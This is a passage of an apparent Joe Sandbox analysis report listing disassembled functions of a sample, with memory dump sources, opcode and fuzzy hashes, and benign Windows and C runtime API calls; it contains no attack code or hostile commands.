                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                  • Instruction ID: 853dc76252ef1ce293f4a3a7a6ff759f81a74ae053185511947a373c7b41fe8b
                  • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                  • Instruction Fuzzy Hash: 32C1A3366150930ADF2D463A957413FBEA15AA27B331A075DDDB3CB1C4FE20D52CEA24
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F50F78 Relevance: .3, Instructions: 341COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                  • Instruction ID: 1039919b6c0057dc518a276d5d53d31dced090e394953b9cea263f7daac9f7c2
                  • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                  • Instruction Fuzzy Hash: B3C1A6366051930ADF2D463A953413FBEA16A927B331A076DDDB2CB0C4FE10E52CEA24
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F5070E Relevance: .3, Instructions: 331COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                  • Instruction ID: c438b1b2f42501ced9c6a6b530278940d97cf302a839d49c8214e3f1a660319c
                  • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                  • Instruction Fuzzy Hash: 58C1B0366051930ADF2D463AD53453FBEA15EA27B331A036DDDB2CB1C5FE20D528EA20
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F46646 Relevance: .3, Instructions: 325COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 883612684351b177135d08ef389f985a1bd2350f1c4a5154a638168b74a32bac
                  • Instruction ID: fff04c78ccf19c47324972da6fa73227001b1c07c940ac6edd8e4da76c9b0b80
                  • Opcode Fuzzy Hash: 883612684351b177135d08ef389f985a1bd2350f1c4a5154a638168b74a32bac
                  • Instruction Fuzzy Hash: 87D1E2B1A043419FDB14CF28C88075ABFE0AF96318F08456DEC84DB642D778E959DB9B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F502F6 Relevance: .3, Instructions: 323COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                  • Instruction ID: a9debd9344c6ae17ccb3aa83142273fb71bb3cb23929b37acfe4235cf13514eb
                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                  • Instruction Fuzzy Hash: A1C1A3366051530ADF2D863A953413FBEA15AA27B331A076DDDB3CB1C5FE20D52CEA24
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F3E2A0 Relevance: .3, Instructions: 318COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a5874b56e2933e660fb4664551c379a7b5a78d488adeea79f0d2f6160d2983bd
                  • Instruction ID: 30f0f8f249675170b3fc8033363c4397d1764c7fdc4b6bbdb56d08581cbdb4fb
                  • Opcode Fuzzy Hash: a5874b56e2933e660fb4664551c379a7b5a78d488adeea79f0d2f6160d2983bd
                  • Instruction Fuzzy Hash: 8FE149755187888FC304CF69D89096ABBF0BF8A300F89095EF5D987352C335E949EB62
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F43A3C Relevance: .3, Instructions: 263COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                  • Instruction ID: 077abfa6b0b78914d48a9e53be8c6c9e10bb232ed5b89569ad66ff48f2ab0a0c
                  • Opcode Fuzzy Hash: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                  • Instruction Fuzzy Hash: 479166716043498BDB24EF68CCD1BBE7BD5EB90310F10092DEAD797282DA78A644E742
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F54969 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 53cca301ad0efb3f82c77ee082ab146e063224af35c83292ad98f4dc38292894
                  • Instruction ID: 4e13d3b8e075fe4f9d7a7a4dc59d7e90fd8a390efcb4d0f593ae833b5ae63db9
                  • Opcode Fuzzy Hash: 53cca301ad0efb3f82c77ee082ab146e063224af35c83292ad98f4dc38292894
                  • Instruction Fuzzy Hash: B5615872E4060866DA349D284856BBF3394EB4172FF100619EF82DB281D519FDCEB759
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F43D6D Relevance: .2, Instructions: 232COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                  • Instruction ID: 008a25fcee6bc9f79b2423b0cf2319a5755113b6f5a5a6f8cfbbe004c912e126
                  • Opcode Fuzzy Hash: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                  • Instruction Fuzzy Hash: E2713F71B043455BDB28DE29C8D0B6D7FE5AB90314F00492DEDC68B282DB78DA8DA752
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F5473A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                  • Instruction ID: 8324a337bfb873de0041b072944d487e29af2e5da126e0dce58997e0eedbb6aa
                  • Opcode Fuzzy Hash: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                  • Instruction Fuzzy Hash: 94514771E00A8456DB388528985A7BF3B899B5732FF180549EF82D7682C309FDCDB395
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F3DE6C Relevance: .2, Instructions: 190COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 69209f8446196a378586080b79ed80ebe66e427de568230e293557b651345f3b
                  • Instruction ID: dd92dd84a5eb5b8563c08160a8c4528078f84b598f1394004ff069ae3e8022d5
                  • Opcode Fuzzy Hash: 69209f8446196a378586080b79ed80ebe66e427de568230e293557b651345f3b
                  • Instruction Fuzzy Hash: 2F816D8221E6D89DC71A5F7D38A42F53FA15B33601F2D04AA84CAC62A3D1B645D9F723
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F3E8A0 Relevance: .2, Instructions: 154COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1baef7a2b7b5960cb8320c094054cd601036504896af8f00e68609ea173ff462
                  • Instruction ID: 365318472695c5361334a090e501ca28bd80b09ca5b01e7b413475d88cfab298
                  • Opcode Fuzzy Hash: 1baef7a2b7b5960cb8320c094054cd601036504896af8f00e68609ea173ff462
                  • Instruction Fuzzy Hash: 3451E3319093D58FCB12CF24954056EBFE0BE9A324F49489EE4D54B242D334EA49EBA3
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F3F968 Relevance: .1, Instructions: 131COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6ab912c7e449e0f702c24c7aa0764b330adab01034abc59b94d79f6f01c2ad64
                  • Instruction ID: 846bbeb460da425489004d7efe5338c527b884db1970c3c29ed99a90b35f6cc3
                  • Opcode Fuzzy Hash: 6ab912c7e449e0f702c24c7aa0764b330adab01034abc59b94d79f6f01c2ad64
                  • Instruction Fuzzy Hash: B8512671A083028FC748CF19D88055AF7E1FF88364F058A2EE899E7740DB34E959CB96
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F437C1 Relevance: .1, Instructions: 112COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                  • Instruction ID: 78c21b2ea22e6d9f66d41b9df44b92b383e98cac758ed1b03cbc8a573d262629
                  • Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                  • Instruction Fuzzy Hash: 5631F6B2A047458FCB14DF28C89166ABFE0FB95310F10492DE8D5C7342D739EA49DB91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F35F3C Relevance: .1, Instructions: 76COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0d8a34272a3a6f0298a9543249f01100226e723cd45816be2dcda88cc5075b34
                  • Instruction ID: 9755508c52380529fd4d4324a895fcaea7e782e11f2fc27736028b16af8655b0
                  • Opcode Fuzzy Hash: 0d8a34272a3a6f0298a9543249f01100226e723cd45816be2dcda88cc5075b34
                  • Instruction Fuzzy Hash: BC212C72E201254BCB48CF2DEDD083A7751A787331B46812BEE56CB2D1C535E924E7A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F3DA98 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 236COMMON
                  Download Yara Rule
                  APIs
                  • _swprintf.LIBCMT ref: 00F3DABE
                    • Part of subcall function 00F3400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F3401D
                    • Part of subcall function 00F41596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00F70EE8,00000200,00F3D202,00000000,?,00000050,00F70EE8), ref: 00F415B3
                  • _strlen.LIBCMT ref: 00F3DADF
                  • SetDlgItemTextW.USER32(?,00F6E154,?), ref: 00F3DB3F
                  • GetWindowRect.USER32(?,?), ref: 00F3DB79
                  • GetClientRect.USER32(?,?), ref: 00F3DB85
                  • GetWindowLongW.USER32(?,000000F0), ref: 00F3DC25
                  • GetWindowRect.USER32(?,?), ref: 00F3DC52
                  • SetWindowTextW.USER32(?,?), ref: 00F3DC95
                  • GetSystemMetrics.USER32(00000008), ref: 00F3DC9D
                  • GetWindow.USER32(?,00000005), ref: 00F3DCA8
                  • GetWindowRect.USER32(00000000,?), ref: 00F3DCD5
                  • GetWindow.USER32(00000000,00000002), ref: 00F3DD47
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                  • String ID: $%s:$CAPTION$d
                  • API String ID: 2407758923-2512411981
                  • Opcode ID: f737da57546126864b747636cb7f59f2c297f3417d19e8bd09433c716d4b692e
                  • Instruction ID: c3d0ab1d28bd35f210b3e32e3aebfb5a351affc05657c09231a23d1d711d41c3
                  • Opcode Fuzzy Hash: f737da57546126864b747636cb7f59f2c297f3417d19e8bd09433c716d4b692e
                  • Instruction Fuzzy Hash: 3D81BF72508305AFD710DF68DD89E6BBBE9EBC8724F04091DFA84932A1D674E809DB52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F5C233 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • ___free_lconv_mon.LIBCMT ref: 00F5C277
                    • Part of subcall function 00F5BE12: _free.LIBCMT ref: 00F5BE2F
                    • Part of subcall function 00F5BE12: _free.LIBCMT ref: 00F5BE41
                    • Part of subcall function 00F5BE12: _free.LIBCMT ref: 00F5BE53
                    • Part of subcall function 00F5BE12: _free.LIBCMT ref: 00F5BE65
                    • Part of subcall function 00F5BE12: _free.LIBCMT ref: 00F5BE77
                    • Part of subcall function 00F5BE12: _free.LIBCMT ref: 00F5BE89
                    • Part of subcall function 00F5BE12: _free.LIBCMT ref: 00F5BE9B
                    • Part of subcall function 00F5BE12: _free.LIBCMT ref: 00F5BEAD
                    • Part of subcall function 00F5BE12: _free.LIBCMT ref: 00F5BEBF
                    • Part of subcall function 00F5BE12: _free.LIBCMT ref: 00F5BED1
                    • Part of subcall function 00F5BE12: _free.LIBCMT ref: 00F5BEE3
                    • Part of subcall function 00F5BE12: _free.LIBCMT ref: 00F5BEF5
                    • Part of subcall function 00F5BE12: _free.LIBCMT ref: 00F5BF07
                  • _free.LIBCMT ref: 00F5C26C
                    • Part of subcall function 00F584DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00F5BFA7,00F63958,00000000,00F63958,00000000,?,00F5BFCE,00F63958,00000007,00F63958,?,00F5C3CB,00F63958), ref: 00F584F4
                    • Part of subcall function 00F584DE: GetLastError.KERNEL32(00F63958,?,00F5BFA7,00F63958,00000000,00F63958,00000000,?,00F5BFCE,00F63958,00000007,00F63958,?,00F5C3CB,00F63958,00F63958), ref: 00F58506
                  • _free.LIBCMT ref: 00F5C28E
                  • _free.LIBCMT ref: 00F5C2A3
                  • _free.LIBCMT ref: 00F5C2AE
                  • _free.LIBCMT ref: 00F5C2D0
                  • _free.LIBCMT ref: 00F5C2E3
                  • _free.LIBCMT ref: 00F5C2F1
                  • _free.LIBCMT ref: 00F5C2FC
                  • _free.LIBCMT ref: 00F5C334
                  • _free.LIBCMT ref: 00F5C33B
                  • _free.LIBCMT ref: 00F5C358
                  • _free.LIBCMT ref: 00F5C370
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                  • String ID:
                  • API String ID: 161543041-0
                  • Opcode ID: d7ec2b8f68165cda25b6d8fd1ac3cabeb9cad4efbbc23a462add70f0ede28cf4
                  • Instruction ID: 5251d0fd729dbd1b379ca556bf039d60dc820e97fbd7e84dcc56380baa6a3b6a
                  • Opcode Fuzzy Hash: d7ec2b8f68165cda25b6d8fd1ac3cabeb9cad4efbbc23a462add70f0ede28cf4
